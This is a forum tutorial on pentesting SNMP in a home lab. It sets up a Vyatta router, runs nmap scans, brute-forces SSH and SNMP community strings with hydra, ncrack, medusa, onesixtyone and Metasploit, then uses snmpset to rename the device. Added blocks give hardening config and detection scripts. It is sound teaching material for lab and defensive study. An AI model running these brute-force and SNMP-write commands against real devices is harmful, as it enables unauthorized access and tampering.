  • SNMP Pentesting

  • nikki

    Member
    May 7, 2020 at 8:23 am

    PENTESTING SNMP PROTOCOL

    hi there this is nikhil

    in this i am gonna explain to you how to pentest the snmp protocol

    i assume u know basics of snmp protocol

    if you dont

    then i have these links for you where you can get better understanding of SNMP protocol

    even if you know it i suggest you take the time and read these, it helps with revision

    https://www.networkmanagementsoftware.com/snmp-tutorial/

    https://www.networkmanagementsoftware.com/snmp-tutorial-part-2-rounding-out-the-basics/

    OK LETS GET STARTED

    SETTING UP OUR SNMP LAB

    i assume you have already setup kali linux on your hyperv

    if you dont have setup kali linux

    there are many youtube tutorials on how to setup kali linux in a virtualization environment

    even i have made tutorial on youtube

    https://www.youtube.com/watch?v=kEKIeDgzG7A

    i hope you are ready with kali linux

    we need to simulate our snmp service

    for that we use a router called ‘vyatta’

    Download here

    http://0.us.mirrors.vyos.net/vyatta/vc6.5/images/

    Load it into VMware or your VirtualBox

    Start the VM

    Now

    it boots

    it had booted in live mode

    it asks for credentials

    default credentials are

    vyatta

    vyatta

    after login we need to install vyatta on the hard disk

    for that type this in command line

    $ install image

    then hit Enter

    it asks you for basic info like

    for almost all options u click enter (default)

    but

    now for the above option write Yes and then hit enter

    now it asks for a password

    set your favourite or set default ‘vyatta’

    NOW REMOVE THE LIVE CD FROM YOUR VMWARE/VBOX AND REBOOT

    now start vyatta vm

    we need to enable some services on our vyatta in order to start pentesting

    CONFIGURING VYATTA

    you can see your shell prompt is in ‘$’

    type

    configure

    to enter into configuration mode

    and enter

    set service ssh

    we have enabled ssh and we need to save our changes

    for that type

    commit

    save

    now we need to set ip address for our vm , type

    (i assume u r still in config mode)

    set interfaces ethernet eth0 address 10.1.1.20/24

    now hit enter

    you can check ip address by typing

    show interfaces

    try to ping from vyatta ( 10.1.1.20 in my case ) to kali linux ( 10.1.1.50 in my case)

    successful

    full view of my network

    i setup using gns3 simulator

    dont worry even in simple vmware setup it works

    CONFIGURING SNMP AND SOME MORE SERVICES

    we will setup ssh (already done), telnet, https, snmp

    syntax will be similar

    set service service-type

    here snmp community strings are like passwords

    i set them as ‘public’ and ‘private’ because out of the box they come with those strings and netadmins forget to change the default strings
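
    here is what those service and community lines look like on a vyatta 6.x box, as an added example (this is not from the post): the weak lab setup first, then a hardened version. the community names and the 10.1.1.50 client address are assumed values for this lab; the `client` option limits which manager may use the string, which is why a leaked ro string is far less useful to anyone else on the segment.

```text
# --- weak: the lab setup from the post (out-of-the-box strings, rw enabled) ---
configure
set service telnet
set service https
set service snmp community public authorization ro
set service snmp community private authorization rw
commit
save

# --- hardened: non-default strings, read-only, and only the NMS may ask ---
configure
delete service snmp community public
delete service snmp community private
set service snmp community <long-random-ro-string> authorization ro
set service snmp community <long-random-ro-string> client 10.1.1.50
commit
save
```

    notice what is missing in the second block: there is no rw community at all, so the snmpset trick later in this post has nothing to use; telnet is also left out because it sends the login in cleartext just like snmpv1 does.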

    our setup was almost complete and if we want to configure anything

    (if i forgot) we do that later

    SCANNING

    now lets do a basic nmap scan against my vyatta – 10.1.1.20

    nmap -sV -n 10.1.1.20

    -sV for version scanning

    -n for no dns name lookup, ip only lol

    we got some info about services that are running on vyatta

    but where is snmp?

    its a udp protocol

    by default nmap scans tcp ports

    and lot of pentesters forget about udp scanning

    so lets scan with -sU option

    it took me lot of time to scan

    as we know the snmp service is running lets directly scan those snmp ports

    161 and 162

    161 is for nms to send queries to agents

    and 162 is for agents to contact or inform to nms

    nmap -sV -n -sU -p161,162 10.1.1.20

    -sU for scanning udp ports

    -p for specifying the ports you are interested in

    as we can see 161 port is open and running SNMPv1

    lets run nmap inbuilt scripts with -sC option

    nmap -sV -n -sU -p161 -sC 10.1.1.20

    -sC for use default nmap scripts

    we got a ton of information about the device because the nmap scripts used the default credentials of snmp which are ‘public’ and ‘private’

    take a look and try to understand different things

    small exercise to you :

    change those default strings and run the nmap scripts again

    now notice the output

    BRUTEFORCING SSH

    now we setup a user on vyatta and try to bruteforce login credentials

    logon to vyatta and type configure to enter into configuration mode

    now type

    set system login user admin authentication plaintext-password aaaa

    now commit and save

    now we have to generate our wordlist

    lets generate simple wordlist

    we use crunch to generate our wordlist

    crunch 4 4 abcd > wordlist

    we use some tools to bruteforce ssh login

    HYDRA

    type this command to bruteforce

    hydra -l admin -P wordlist 10.1.1.20 ssh

    -l for username

    -L for list of usernames

    -p for a single password

    -P for list of passwords

    wordlist- my wordlist

    ssh-protocol i want to bruteforce

    as you can see hydra successfully found the password ‘aaaa’

    NCRACK

    type this syntax

    ncrack -v -T 5 --user admin -P wordlist 10.1.1.20:22

    -v for verbose that means we can know whats happening

    -T 5 use 5 threads

    –user for username

    you did not see the password in the output

    you think its failed right?

    yeah it failed

    but i can run it again and show when it succeeded

    but what i want is

    you need to understand that some tools fail at some time

    so dont always rely on one tool

    learn more tools and how they work and if time permits learn python and write your own scripts

    MEDUSA

    type this syntax

    medusa -h 10.1.1.20 -u admin -P wordlist -M ssh

    -h for host

    -u for username

    -P for list of passwords

    -M for module you want to execute

    if you want to know what modules medusa support

    type

    medusa -d

    medusa succeeded

    METASPLOIT MODULES

    heres my best friend metasploit

    i love metasploit more than my girlfriend(who doesnot exist)

    first we need to setup database to make metasploit searches faster and also to store results

    service postgresql start

    and then type

    msfconsole

    the following screen shows up

    now to brute force ssh

    we need to search for ‘ssh_login’

    its a module thats inbuilt in metasploit

    after typing

    search ssh_login

    we gonna use first one

    for that we need to use ‘use’

    type this

    use auxiliary/scanner/ssh/ssh_login

    now you get this

    after that type

    show options

    now you get

    so much output

    dont worry

    take time to understand whats that

    thats parameters required to bruteforce

    we gonna use main ones

    we gonna set rhosts to our vyatta vm

    set rhosts 10.1.1.20

    and username to admin

    set username admin

    and passwordfile to our wordlist path

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    type run and hit enter

    successful password is ‘aaaa’

    and u can also notice that a command shell has also been opened

    now you can interact with that shell

    type exit to exit out of the session
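
    one defender-side counterpart to the four brute-force tools above, written as an added example (it is not from the post, and not part of hydra, ncrack, medusa or metasploit): the same guessing run shows up on the target as a burst of `Failed password` lines in sshd's auth log, which vyatta writes like any debian box. the script parses a handful of constructed log lines (the 10.1.1.50 address is this lab's kali box, 10.1.1.7 is an assumed normal user) and flags any source that fails repeatedly inside a short window, noting when a success followed, which is exactly the ‘aaaa’ outcome hydra and ssh_login produced.

```python
# Added example (not from the original post): detect SSH password guessing
# from OpenSSH auth-log lines. Threshold and window are tunable; the log
# lines at the bottom are constructed for this demo, not captured output.
import re
from collections import defaultdict
from datetime import datetime

# "May  7 08:23:01 vyatta sshd[1201]: Failed password for admin from 10.1.1.50 port 40122 ssh2"
# (sshd also writes "Failed password for invalid user <name> ..." for unknown users)
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def _parse_ts(ts: str, year: int) -> datetime:
    # syslog timestamps carry no year, so the caller supplies one
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2020):
    """Return {source_ip: finding} for every source with >= threshold failed
    logins inside any window_seconds span, plus any success that followed."""
    failures = defaultdict(list)   # ip -> sorted failure times
    users = defaultdict(set)       # ip -> usernames that were tried
    successes = defaultdict(list)  # ip -> [(time, user)]
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append(_parse_ts(m["ts"], year))
            users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            successes[m["ip"]].append((_parse_ts(m["ts"], year), m["user"]))

    findings = {}
    for ip, times in failures.items():
        times.sort()
        # sliding window: densest run of failures within window_seconds
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # a login that succeeded after the guessing started is the real alarm
            success_after = [u for t, u in successes[ip] if t >= times[0]]
            findings[ip] = {
                "failures_in_window": best,
                "users_tried": sorted(users[ip]),
                "success_after_failures": success_after,
            }
    return findings


# Constructed sample: a 6-guess burst from the kali box ending in a hit,
# and one ordinary mistyped password from another host.
SAMPLE_LOG = """\
May  7 08:23:01 vyatta sshd[1201]: Failed password for admin from 10.1.1.50 port 40122 ssh2
May  7 08:23:01 vyatta sshd[1202]: Failed password for admin from 10.1.1.50 port 40124 ssh2
May  7 08:23:02 vyatta sshd[1203]: Failed password for admin from 10.1.1.50 port 40126 ssh2
May  7 08:23:02 vyatta sshd[1204]: Failed password for admin from 10.1.1.50 port 40128 ssh2
May  7 08:23:03 vyatta sshd[1205]: Failed password for admin from 10.1.1.50 port 40130 ssh2
May  7 08:23:03 vyatta sshd[1206]: Failed password for admin from 10.1.1.50 port 40132 ssh2
May  7 08:23:04 vyatta sshd[1207]: Accepted password for admin from 10.1.1.50 port 40134 ssh2
May  7 09:10:00 vyatta sshd[1300]: Failed password for vyatta from 10.1.1.7 port 50000 ssh2
May  7 09:12:00 vyatta sshd[1301]: Accepted password for vyatta from 10.1.1.7 port 50002 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, finding in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

    a 4-character wordlist of a-d is 256 guesses, so even with hydra's default parallelism the burst is unmistakable in the log; the more useful habit this builds is looking for the `Accepted` line right after the burst rather than just counting failures.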

    BRUTEFORCING SNMP COMMUNITY STRINGS

    first lets delete our public and private community strings

    by

    delete service snmp community public

    delete service snmp community private

    and i set ‘bbbb’ as ro string and ‘cccc’ as rw string

    NMAP SCRIPTING ENGINE

    before we used -sC to use nmap default scripts

    now we use snmp-brute script to bruteforce snmp strings

    type this

    nmap -sU -p 161 -n --script snmp-brute 10.1.1.20 --script-args snmp-brute.communitiesdb=/root/Desktop/wordlist

    hurray!

    we got snmp community strings ‘bbbb’ and ‘cccc’

    METASPLOIT MODULES

    metasploit be like : you cant live without me! where did that bring you? BACK 2 ME

    now we use snmp_login module for bruteforcing

    search snmp_login

    use auxiliary/scanner/snmp/snmp_login

    now guess what we type?

    yeah

    show options

    as you can see bunch of stuff similar to when we used ssh_login module

    in this also we only use main ones

    set rhosts 10.1.1.20

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    i think these are main ones

    u can customize yourself

    i suggest you to set threads to 10

    its gonna be slow if u dont set it

    its gonna take a really long time

    now i reduced the items and ran it again

    MEDUSA

    similar syntax as that of ssh

    medusa -h 10.1.1.20 -u admin -P wordlist1 -M snmp

    medusa also succeeded

    ONESIXTYONE

    onesixtyone is also tool used to bruteforce snmp community strings

    as the name says 161 is the port of snmp, thus the name

    onesixtyone -c wordlist 10.1.1.20

    got community strings as expected

    POST EXPLOITATION

    ok we got the community strings , now what?

    we can read and know the configuration of the network and also other information that is stored in that router

    lets get started

    snmpwalk

    this tool walks along the OID tree using get-next requests and gets all the info you need

    snmpwalk -v1 -c bbbb 10.1.1.20

    -v1 is the snmp version number

    -c is community string

    you get ton of information

    ok what is this information?

    all the information is stored in objects and is accessed using numbers (oids)

    you can copy paste any oid and check here

    http://www.oid-info.com/

    ok can we modify the value?

    yes because we have the rw string which is ‘cccc’

    ok how we can modify?

    we use

    snmpset

    ok lets modify the vyatta name and its oid is

    iso.3.6.1.2.1.1.5.0

    snmpset -v1 -c cccc 10.1.1.20 iso.3.6.1.2.1.1.5.0 s hacked

    s for string notation

    its saying that value changed

    lets check by running snmpwalk again

    snmpwalk -v1 -c bbbb 10.1.1.20 | head -10

    head command gives only first 10 lines of output

    as you can see our ‘vyatta’ string has changed into ‘hacked’

    you may find that with snmpwalk we are getting output in oid format and we need a conversion to see things like what ip address its using, sys configuration etc

    for that we have

    snmpcheck

    snmpcheck -c cccc -t 10.1.1.20

    -t for specifying target

    you can now easily understand the output than snmpwalk

    METASPLOIT MODULES

    again huh?

    hell yeah

    there are some snmp post exploitation modules in order to get information

    snmp_enum

    search snmp_enum

    now as usual type

    show options

    set community cccc

    set rhosts 10.1.1.20

    run

    you get lot of output showing sys information,processes running and so much

    snmp_set

    as the name implies this module modifies oid values like the snmpset command

    as normal

    search snmp_set

    use path_to_snmp_set

    show options

    set rhosts 10.1.1.20

    set community cccc

    set oid iso.3.6.1.2.1.1.5.0

    run

    now u get an error because of ‘iso’ in our oid string

    we need to convert it into number

    as we know value of iso is 1 (top of tree)

    set oid 1.3.6.1.2.1.1.5.0

    set oidvalue value_you_want_to_set

    successful

    we check using snmpwalk command

    successful

    there is a tool to convert oid names to numbers

    we need to find the oid number of ‘iso’

    we can use

    snmptranslate

    snmptranslate -On iso.3.6.1.2.1.1.5.0
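
    to tie the post-exploitation part together, here is an added example (not from the post and not part of net-snmp or metasploit) written straight from the snmpv1 message format: it does the `iso` to `1` conversion that snmptranslate -On does, BER-encodes the oid, builds the same kind of get and set messages that snmpwalk and snmpset send, and then parses a raw datagram the way a wire sensor would. the defender's point from the ‘community strings are like passwords’ section is visible in the bytes: the community is a plaintext octet string at the front of every packet, and a SetRequest carrying the rw string is all it takes to rename the box. the packet bytes are constructed here, not captured from the lab.

```python
# Added example (not from the original post): minimal SNMPv1 encoder/decoder
# built from the message layout (BER TLVs), for understanding and detection.
DEFAULT_COMMUNITIES = {"public", "private"}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}


def oid_to_arcs(oid: str) -> list:
    """'iso.3.6.1.2.1.1.5.0' or '.1.3.6.1.2.1.1.5.0' -> [1,3,6,1,2,1,1,5,0].
    This is the conversion snmptranslate -On performs: 'iso' is arc 1."""
    parts = oid.strip(".").split(".")
    if parts[0] == "iso":
        parts[0] = "1"
    return [int(p) for p in parts]


def _ber_len(n: int) -> bytes:
    # short form below 128, long form (0x80 | byte count, then the count) above
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(body)) + body


def encode_int(v: int) -> bytes:
    # two's-complement, minimal length, extra 0x00 when the top bit is set
    body = v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True)
    return tlv(0x02, body)


def encode_oid(arcs: list) -> bytes:
    """BER OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest in
    base-128 with a continuation bit on every byte except the last."""
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_v1_message(pdu_tag: int, community: str, oid: str,
                     request_id: int = 1, value: bytes = None) -> bytes:
    """Whole SNMPv1 datagram. value=None gives a NULL varbind (a Get);
    pass tlv(0x04, b'hacked') with pdu_tag 0xA3 for a string SetRequest."""
    if value is None:
        value = tlv(0x05, b"")
    varbind = tlv(0x30, encode_oid(oid_to_arcs(oid)) + value)
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0)
              + tlv(0x30, varbind))  # request-id, error-status, error-index, varbinds
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)  # version 0 = v1


def _read_tlv(buf: bytes, pos: int):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def inspect_snmp(datagram: bytes) -> dict:
    """Pull version, community and PDU type out of a raw UDP/161 payload and
    attach the alerts a monitoring rule would raise on it."""
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, vbody, pos = _read_tlv(msg, 0)
    _, cbody, pos = _read_tlv(msg, pos)
    ptag, _, _ = _read_tlv(msg, pos)
    version = int.from_bytes(vbody, "big", signed=True)
    community = cbody.decode("latin-1")
    finding = {"version": {0: "v1", 1: "v2c"}.get(version, f"unknown({version})"),
               "community": community, "pdu": PDU_NAMES.get(ptag, hex(ptag)), "alerts": []}
    if community in DEFAULT_COMMUNITIES:
        finding["alerts"].append("default community string in use")
    if ptag == 0xA3:
        finding["alerts"].append("SetRequest seen: rw community exposed in cleartext")
    return finding


if __name__ == "__main__":
    get = build_v1_message(0xA0, "public", "iso.3.6.1.2.1.1.5.0")
    print(get.hex(), inspect_snmp(get))
    rename = build_v1_message(0xA3, "cccc", ".1.3.6.1.2.1.1.5.0", value=tlv(0x04, b"hacked"))
    print(rename.hex(), inspect_snmp(rename))
```

    run it and look at the hex: `7075626c6963` (‘public’) and `63636363` (‘cccc’) sit right after the version byte, which is the whole reason the post's nmap -sC run could read everything and why a sniffer on the segment learns the rw string the first time anyone uses snmpset. snmpv3 with authPriv is the fix; until then the detection above (default strings, or any SetRequest at all) is cheap to run on port 161 traffic.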


    sorry only 2 photos are showing

    i hope u get a better understanding when u r doing this practically

SECARMY - Security and Research Community